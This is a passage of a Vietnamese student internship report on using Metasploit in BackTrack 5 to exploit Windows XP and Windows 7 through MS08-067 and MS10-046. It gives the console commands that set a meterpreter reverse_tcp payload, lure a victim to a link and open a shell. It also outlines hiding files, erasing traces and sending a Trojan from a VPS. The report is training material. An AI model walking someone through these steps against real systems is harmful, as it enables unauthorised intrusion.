baocaothuctap athena

46
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THỰC TẬP HƯƠNG DẪN SỬ DỤNG METASPLOIT ĐỂ KHAI THÁC LỖ HỔNG MẠNG Giảng viên hướng dẫn: Võ Đỗ Thắng Sinh viên thực hiện: Dương Văn Hòa [Type here]

Upload: tao-la-linh

Post on 07-Aug-2015

30 views

Category:

Technology


0 download

TRANSCRIPT

Page 1: Baocaothuctap athena

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNGVÀ AN NINH MẠNG QUỐC TẾ ATHENA

BÁO CÁO THỰC TẬP

HƯƠNG DẪN SỬ DỤNG METASPLOIT ĐỂ KHAI THÁC LỖ HỔNG MẠNG

Giảng viên hướng dẫn: Võ Đỗ ThắngSinh viên thực hiện: Dương Văn Hòa

TP. Hồ Chí Minh,ngày 20 tháng 4 năm 2015

[Type here]

Page 2: Baocaothuctap athena

ĐÁNH GIÁ CỦA GIÁO VIÊN HƯỚNG DẪN

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

Tp Hồ Chí Minh, ngày … tháng … năm 2015

Giảng viên hướng dẫn

Võ Đỗ Thắng

[Type here]

Page 3: Baocaothuctap athena

ĐÁNH GIÁ CỦA GIÁO VIÊN HƯỚNG DẪN

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

Tp Hồ Chí Minh, ngày … tháng … năm 2015

Giảng viên hướng dẫn

[Type here]

Page 4: Baocaothuctap athena

LỜI CẢM ƠN KHOA CÔNG NGHỆ THÔNG TIN

TRƯỜNG ĐẠI HỌC CÔNG NGHIỆP TPHCM

Em xin chân thành cảm ơn trường Đại Học Công Nghiệp TPHCM và khoa Công

Nghệ Thông Tin đã tạo điều kiện cho em hoàn thành tốt đợt Thực Tập này. Trong đợt

thực tập này đã cho em những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp em

hoàn thiện hơn trong công việc và môi trường làm việc sau này.

Mặc dù em đã cố gắng hoàn thành báo cáo thực tập này với tất cả nổ lực của bản

thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không

thể tránh khỏi những thiếu sót nhất định. Em rất mong nhận được sự đóng góp, chia sẻ để

em có thể làm tốt hơn nữa.

Một lần nữa em xin chân thành cảm ơn.

[Type here]

Page 5: Baocaothuctap athena

LỜI CẢM ƠN TRUNG TÂM ATHENA

Em xin cảm ơn giám đốc Trung Tâm Quản Trị Mạng và An Ninh Mạng Quốc Tế

Athena, cùng các anh chị trong trung tâm. Đặc biệt, em xin chân thành cảm ơn thầy Võ Đỗ

Thắng đã nhiệt tình giúp đỡ và hướng dẫn em trong suốt thời gian thực tập. Thầy đã tạo

mọi điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết cũng như đóng góp những ý

kiến quý báu để hoàn thành tốt bài báo cáo này.

Em cũng xin gửi lời cám ơn đến các anh chị, bạn bè đã truyền đạt kinh nghiệm và

tạo điều kiện cho em hoàn thành đề tài này.

Trong quá trình thực hiện đề tài không thể không có những sai sót, mong thầy cô

tại trung tâm ATHENA và các bạn thẳng thắn góp ý đề em rút kinh nghiệm trong các công

trình tìm hiểu, phát triển sau này.

Một lần nữa em xin chân thành cảm ơn.

[Type here]

Page 6: Baocaothuctap athena

MỤC LỤC

GIỚI THIỆU TRUNG TÂM.............................................................................................3

Lịch sử hình thành..........................................................................................................3

Lĩnh vực hoạt động.........................................................................................................3

Đội ngũ giảng viên...........................................................................................................3

Địa chỉ liên hệ..................................................................................................................4

MỞ ĐẦU.............................................................................................................................5

CHƯƠNG I: GIỚI THIỆU ĐỀ TÀI.................................................................................6

1. Tên đề tài: NGHIÊN CỨU HƯỚNG DẪN SỬ DỤNG METASPLOIT ĐỂ KHAI THÁC LỖ HỔNG..............................................................................................................6

2. METASPLOIT là gì?...............................................................................................6

3. Môi trường thực hiện...............................................................................................6

4. Các lỗ hỏng thường được khai thác trong hệ điều hành......................................6

5. Quá trình tấn công vào hệ thống.............................................................................7

CHƯƠNG 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN...................................................................................................................10

1. Giới thiệu về hệ điều hành backtract 5 R3...........................................................10

2. Giới thiệu về metasploit.........................................................................................11

2.1. Metasploit Enviroment:..................................................................................12

2.2. Chọn module exploit:Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác.

………………………………………………………………………………………… 11

2.3. Cấu hình các module exploit đã chọn............................................................12

2.4. Verify những options vừa cấu hình................................................................13

2.5. Lựa chọn target................................................................................................13

2.6. Lựa chọn payload............................................................................................13

2.7. Thực thi exploit................................................................................................13

3. Sơ đồ tổng quan hệ thống LAN.............................................................................13

4. Xâm nhập và khai thác lỗ hỏng trên win sp sp3..................................................14

[Type here]

Page 7: Baocaothuctap athena

4.1. Sử dụng mã lỗi ms08_067...............................................................................15

4.2. Sử dụng mã lỗi ms10_046 tấn công win 7......................................................17

CHƯƠNG 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG TỪ XA QUA MẠNG INTERNET.........................................................................................21

1. Máy chủ ảo VPS.....................................................................................................21

1.1. Định nghĩa........................................................................................................21

1.2. Đặc điểm về thông số VPS..............................................................................21

2. Honeypot.................................................................................................................21

3. Sơ đồ tổng quan sử dụng Honeypot xâm nhập từ xa thông qua internet.........22

4. Tấn công trên internet...........................................................................................23

CHƯƠNG 4: TỔNG KẾT...............................................................................................26

TÀI LIỆU THAM KHẢO...............................................................................................27

[Type here]

Page 8: Baocaothuctap athena

MỤC LỤC HÌNH ẢNH

hình 1: quá trình tấn công vào 1 hệ thống.......................................................................9

hình 2: Sơ đồ tổng quan hệ thống mạng LAN...............................................................14

hình 3: khởi động metasploit...........................................................................................16

hình 4: bước 1 ms10_090.................................................................................................17

hình 5: bước 2 ms08_067................................................................................................18

hình 6 : ms10_046 bước 1................................................................................................19

hình 7 : ms10_042 bước 2................................................................................................20

hình 8 : ms10_042 bước 3................................................................................................20

hình 9 : ms10_042 bước 4................................................................................................21

hình 10: đã cài đặt thành công metasploit trên VPS.....................................................24

hình 11: gửi Trojan về máy victim..................................................................................25

hình 12: khai thác thông tin từ máy victim....................................................................26

8SVTH: Dương Văn Hòa

Page 9: Baocaothuctap athena

GIỚI THIỆU TRUNG TÂMLịch sử hình thànhTrung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế Athena được thành lập

vào năm 2004 là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng lượng, nhiệt

huyết và kinh nghiệm trong lĩnh vực CNTT.

Lĩnh vực hoạt độngTrung tâm đã và đang tập trung đào tạo chuyên sâu quản trị mạng, an ninh mạng và

thương mại điện tử theo tiêu chuẩn quốc tế như Microsoft, Cisco, Linux LPI, CEH,…

song song đó trung tâm còn có các chương trình đào tạo cao cấp dành riêng theo đơn đặt

hàng dành riêng của Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh nghiệp , các cơ

quan chính phủ và tổ chức tài chính,…

Sau gần 10 năm hoạt động, nhiều học viên tốt nghiệp trung tâm Athena đã là chuyên gia

đảm nhận công tác quản lý hệ thống mạng, an ninh cho nhiều bộ ngành như Cục Thông

Tin-Bộ Quốc Phòng, sở thông tin truyền thông các tỉnh,…

Ngoài chương trình đào tạo, trung tâm còn có các chương trình hợp tác và trao đổi công

nghệ với các trường đại học lớn như: ĐH bách khoa tp Hồ Chí Minh, học viện bưu chính

viễn thông, hiệp hội an toàn thông tin(VNISA), viện kỹ thuật quân sự,…

Đội ngũ giảng viênTất cả các giảng viên của trung tâm Athena đều tốt nghiệp từ các trường đại học hàng đầu

trong nước và phải có chứng chỉ quốc tế MCSA, MCSE, CCNA, CCNP, Security+, CEH,

có bằng siêu phạm quốc tế MCT(Microsoft Certified Trainer). Đây là các chứng chỉ

chuyên môn bắt buộc đê dù điều kiện tham gia giảng dậy tại trung tâm ATHENA.

Bên cạnh đó các giảng viên thường xuyên đi tu nghiệp và cập nhật kiến thức công nghệ

mới từ các nước phát triển tiên tiến như Mỹ, Pháp, Hà Lan,… và truyền đạt các công nghệ

mới này trong các chương trình đào tạo tại trung tâm ATHENA.

9SVTH: Dương Văn Hòa

Page 10: Baocaothuctap athena

Địa chỉ liên hệ TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA

Liên hệ:

- Cơ sở 1:

92 Nguyễn Đình Chiểu, Phường Đa Kao, Q1, TPHCM

Điện thoại: - 0907879477

- 0943230099

- (08)38244041

Gần ngã tư Đinh Tiên Hoàng - Nguyễn Đình Chiểu

- Cơ sở 2:

2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Q1, TPHCM

Điện thoại: - 0943200088

- (08)22103801

Cạnh sân vận động Hoa Lư - Cách đài truyền hình Tp HTV 50 mét

- Website: http://athena.edu.vn

- E-mail : [email protected]

[email protected]

10SVTH: Dương Văn Hòa

Page 11: Baocaothuctap athena

MỞ ĐẦUTheo thống kê, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cơ

quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có khoảng 300 website bị tấn

công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu phát triển của Bkav cho biết,

các cơ quan doanh nghiệp bị tấn công gần như là đầy đủ, từ ít nghiêm trọng đến nghiêm

trọng và rất nghiêm trọng (nhằm đánh cắp các tài liệu mật) và các mã độc này nhắm cả

vào Bộ Công An, Bộ Quốc phòng, ngân hàng, các cơ quan đơn vị nghiên cứu, các doanh

nghiệp…Đã có những chiến dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam.

Trong đó, bản thân các vụ tấn công trên mạng và các vụ xâm nhập hệ thống công nghệ

thông tin là nhằm do thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không

lành mạnh và một số vụ mất an toàn thông tin số khác đang gia tăng ở mức báo động về

số lượng, đa dạng về hình thức, tinh vi hơn về công nghệ.

Trước tình hình đó, song song việc ban hành chỉ thị 897/CT-TTg, Thủ Tướng chỉ đạo các

Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số. Thủ tướng

Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông tin số ở nước

ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng

công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an ninh.

Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử dụng để tấn

công xâm nhập và khai thác vào các phiển bản hệ điều hành Windows, hệ điều hành phổ

biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử

dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật

trong thời đại Internet ngày nay.

11SVTH: Dương Văn Hòa

Page 12: Baocaothuctap athena

CHƯƠNG I: GIỚI THIỆU ĐỀ TÀI

1. Tên đề tài: NGHIÊN CỨU HƯỚNG DẪN SỬ DỤNG METASPLOIT ĐỂ

KHAI THÁC LỖ HỔNG

2. METASPLOIT là gì?

Metasploit framework là một framework mã nguồn mở phát triển nhằm

sử dụng các shellcode (payload) để tấn công máy có lỗ hổng.Cùng với một số

bộ công cụ bảo mật khác,Metasploit có cơ sở dữ liệu chứa hàng ngàn

shellcode ,hàng ngàn exploit của các hệ điều hành,các chương trình hay dịch

vụ.Trong quá trình phát triển metasploit liên tục cập nhật các Exploit...Nên

càng ngày nó càng trở thành một bộ công cụ mạnh mẽ.

3. Môi trường thực hiện

Môi trường thực hiện trên windows xp sp2 thông qua các lỗ hỏng đã bị phát hiện.

Thực hiện trên mạng LAN và xây dựng HONEYPOT khai thác xâm nhập lỗ hỏng

từ xa thông qua internet.

4. Các lỗ hỏng thường được khai thác trong hệ điều hành

Như chúng ta đã biết, Windows là hệ điều hành phổ biến và được sử dụng rộng rãi

nhất trên thế giới hiện nay. Và với việc được tạo nên bằng một cấu trúc lệnh có thể

nói khổng lồ như vậy thì việc sai sót lỗi sẽ là chuyện không tránh khỏi. Việc chiếm

lĩnh hàng đầu của hệ điều hành này cũng là nguyên nhân khiến các hacker tìm

kiếm những lổ hỏng bảo mật để tấn công nhằm kiểm soát hay đánh cắp thông tin.

12SVTH: Dương Văn Hòa

Page 13: Baocaothuctap athena

Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều hành,

các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các

lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên

bản trước. Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên

bản cũ mà mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để tấn

công vào hệ thống. Thông thường, các forum của các hãng nổi tiếng luôn cập nhật

các lỗ hổng bảo mật và việc khai thác các lỗ hổng đó như thế nào thì tùy từng

người.

Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của hệ

điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày

càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của

Microsoft.

Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy cập

vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các chương trình độc

hại được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật

exploit, đang ngày càng phổ biến nhanh chóng.

Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH

Windows, Internet Explorer, Windows Server, Microsoft Exchange

và .NetFramework.

5. Quá trình tấn công vào hệ thống

Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu phía

trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó,

có thể được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau:

13SVTH: Dương Văn Hòa

Page 14: Baocaothuctap athena

hình 1: quá trình tấn công vào 1 hệ thống

Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ

thống. Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu

ích, chính xác hơn.

Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu cầu

chúng ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào khác,

mục tiêu phải đạt tới là quyền truy cập vào hệ thống.

Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user

binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công.

Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước

malware, keylogger, rootkit…để chạy nó trên máy tính tấn công.

Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần

phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.

14SVTH: Dương Văn Hòa

Page 15: Baocaothuctap athena

Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có

liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không

khả năng bạn bị phát hiện là kẻ đột nhập là rất cao.

Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá

trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật

như Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp

dụng cho mục đích truy tìm thông tin.

Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn công

hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để làm sao vào được

trong hệ thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu,

chạy chương trình trojan, keylogger…

15SVTH: Dương Văn Hòa

Page 16: Baocaothuctap athena

CHƯƠNG 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN

1. Giới thiệu về hệ điều hành backtract 5 R3

Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử

nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của

Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên

bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux

Ubuntu 11.10.

Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau.

Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.

(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... Hiện tại

Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là

sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor.

Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm

thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có thể

được phân loại như sau:

Information gathering: loại này có chứa một số công cụ có thể được sử dụng để

có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail,

trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các

thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.

Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra

các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và

cũng làm portscanning.

Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các

công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng

chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và

Simple Network Management Protocol (SNMP).

Web application analysis: loại này chứa các công cụ có thể được sử dụng trong

theo dõi, giám sát các ứng dụng web.

16SVTH: Dương Văn Hòa

Page 17: Baocaothuctap athena

Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng

tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này.

Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ

hổng tìm thấy trong các máy tính mục tiêu.

Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các

máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng

cao đặc quyền của chúng ta cho các đặc quyền cao nhất.

Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc

duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có

được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ

để duy trì quyền truy cập.

Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ

trong thể loại này.

Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có

thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu

trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung

cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong

trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng

và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.

Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ

rối chương trình một hoặc tháo rời một tập tin thực thi.

2. Giới thiệu về metasploit

Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ

hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống

phát hiện tấn công mạng. Metasploit Framework là một môi trường dùng để

kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ

ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C,

assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành:

Linux, Windows, MacOS.

Metasploit hỗ trợ nhiều giao diện với người dùng:17

SVTH: Dương Văn Hòa

Page 18: Baocaothuctap athena

Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng các

dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.

Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao diện

Web.

Command line interface: dùng msfcli.

2.1. Metasploit Enviroment:

Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những

options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module

exploits.

Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và unset,

enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh

hưởng đến các module exploit khác Chúng có thể lưu lại enviroment mình đã

cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và

sẽ được load trở lại khi user interface được thực hiện.

2.2. Chọn module exploit:Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có

hỗ trợ để khai thác.

Show exploits: xem các module exploit mà framework có hỗ trợ.

Use exploit_name: chọn module exploit.

Info exploit_name: xem thông tin về module exploit.

Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên

www.metasploit.com hoặc qua lệnh msfupdate hoặc

svnupdat/opt/metasploit/msf3/.

2.3. Cấu hình các module exploit đã chọn

show options: Xác định những options nào cần cấu hình.

set: cấu hình cho những option của module đó.

Một vài module còn có những advanced options, chúng ta có thể xem bằng

cách gõ dòng lệnh show advanceds.

2.4. Verify những options vừa cấu hình

check: kiểm tra xem những option đã được set chính xác chưa.

2.5. Lựa chọn target

18SVTH: Dương Văn Hòa

Page 19: Baocaothuctap athena

show targets: những target được cung cấp bởi module đó.

set: xác định target nào.

2.6. Lựa chọn payload

show payloads: liệt kê ra những payload của module exploit hiện tại.

info payload_name: xem thông tin chi tiết về payload đó.

set payload payload_name: xác định payload module name. Sau khi lựa

chọn payload nào, dùng lệnh show options để xem những options của

payload đó.

show advanced: xem những advanced options của payload đó.

2.7. Thực thi exploit

exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho

chúng ta những thông tin về hệ thống được khai thác.

3. Sơ đồ tổng quan hệ thống LAN

hình 2: Sơ đồ tổng quan hệ thống mạng LAN

Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng

cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy

tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ

19SVTH: Dương Văn Hòa

Page 20: Baocaothuctap athena

tập tin, máy in, máy quét và một số thiết bị khác. Khi một máy tính ở trong mạng

LAN, nó có thể sử dụng các chương trình, phần mềm quét hệ thống mạng để biết

được địa chỉ IP các host có trong mạng.

Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện mạng

và kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được

cài đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn

trên mạng, các dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ

điều hành gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc gói tin

hoặc tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap chạy được trên

tất cả các hệ điều hành, và các gói nhị phân chính thức có sẵn cho Linux,

Windows, và Mac OSX.

Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ quét

lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác truy

cập vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus, download tại

địa chỉ http://www.nessus.org/.

Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ thống,

Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload files, thay

đổi cấu trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài trojan/

backdoor,…

4. Xâm nhập và khai thác lỗ hỏng trên win sp sp3

Các quá trình tấn công xâm nhập trên win sp sp3 trước tiên đã được tìm hiểu bằng

các công nghệ thăm dò máy bị tấn công.

Và khởi động metasploit trên backtrack 5 R3 bằng cmd: msfconsole

Ví dụ ở đây địa chỉ máy backtrack là 192.168.1.20

20SVTH: Dương Văn Hòa

Page 21: Baocaothuctap athena

hình 3: khởi động metasploit

4.1. Sử dụng mã lỗi ms08_067

- Bước 1: Sau khi khởi động metapsloit ta tiến hành:

Tìm mã lỗi của hệ điều hành do đã thu thập thông tin từ trước:

search ms08_067

Copy dòng mã lỗi đã được tìm thấy và gắn vào sau use

Sau đó show các options cần thiết cho tấn công bằng show options ở đây

chúng ta chỉ chú ý tới các option yes.

21SVTH: Dương Văn Hòa

Page 22: Baocaothuctap athena

hình 4: bước 1 ms10_090

- Bước 2: set các options và exploit mã lỗi

Set RHOST <địa chỉ ip win xp sp3>

Set PAYLOAD windows/meterpreter/reverse_tcp

Set LHOST < địa chỉ ip backtrack>

Sau khi đã set xong các options ta show lai lần nữa để kiểm cho coi đã

đầy đủ chưa.

Rồi exploit mã lỗi ra một link cho mấy victim truy cập.

22SVTH: Dương Văn Hòa

Page 23: Baocaothuctap athena

hình 5: bước 2 ms08_067

- Bước 3: sau khi chạy xong máy backtrack sẽ hiện lên giao diện meterpreter

và xác định tấn công thành công.

4.2. Sử dụng mã lỗi ms10_046 tấn công win 7

- Bước 1: search mã lỗi và show options

Tìm mã lỗi của hệ điều hành do đã thu thập thông tin từ trước:

search ms10_046

Copy dòng mã lỗi đã được tìm thấy và gắn vào sau use

Sau đó show các options cần thiết cho tấn công bằng show options ở đây

chúng ta chỉ chú ý tới các option yes.

23SVTH: Dương Văn Hòa

Page 24: Baocaothuctap athena

hình 6 : ms10_046 bước 1

- Bước 2: set options

Set SRVRHOST <địa chỉ ip backtrack>

Set PAYLOAD windows/meterpreter/reverse_tcp

Set LHOST < địa chỉ ip backtrack>

Sau khi đã set xong các options ta show lai lần nữa để kiểm cho coi đã

đầy đủ chưa.

Rồi exploit mã lỗi ra một link cho mấy victim truy cập.

24SVTH: Dương Văn Hòa

Page 25: Baocaothuctap athena

hình 7 : ms10_042 bước 2

- Bước 3: chờ nạn nhân truy cập đường link chúng ta exploit ra

hình 8 : ms10_042 bước 3

- Bước 4: thực hiện ý đồ tấn công25

SVTH: Dương Văn Hòa

Page 26: Baocaothuctap athena

Session xác định ta đang làm việc với mã lỗi nào

Session –i 1 chọn máy nạn nhân

Help để show các tác vụ có thể thực hiện

Ở đây ta thực hiện tạo 1 thư mục trên desktop của nạn nhân bằng

cách shell để đứng trên máy nạn nhân mkdir <tên thư mục>.

hình 9 : ms10_042 bước 4

26SVTH: Dương Văn Hòa

Page 27: Baocaothuctap athena

CHƯƠNG 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG TỪ XA QUA MẠNG INTERNET

1. Máy chủ ảo VPS

1.1. Định nghĩa

Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật

lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có

thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này

chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.

Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn

quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế

100% khả năng bị hack local.

Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên

server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các

Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì

mọi tài khoản khác trên VPS đều hoạt động bình thường.

VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng,

nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người

sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,.

1.2. Đặc điểm về thông số VPS

Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung

lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP và hệ điều hành riêng.

Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.

Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng

khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng

trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao

Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên

mà không cần phải khởi động lại hệ thống.

2. Honeypot

27SVTH: Dương Văn Hòa

Page 28: Baocaothuctap athena

Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục đích giả

dạng đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu hút sự chú ý

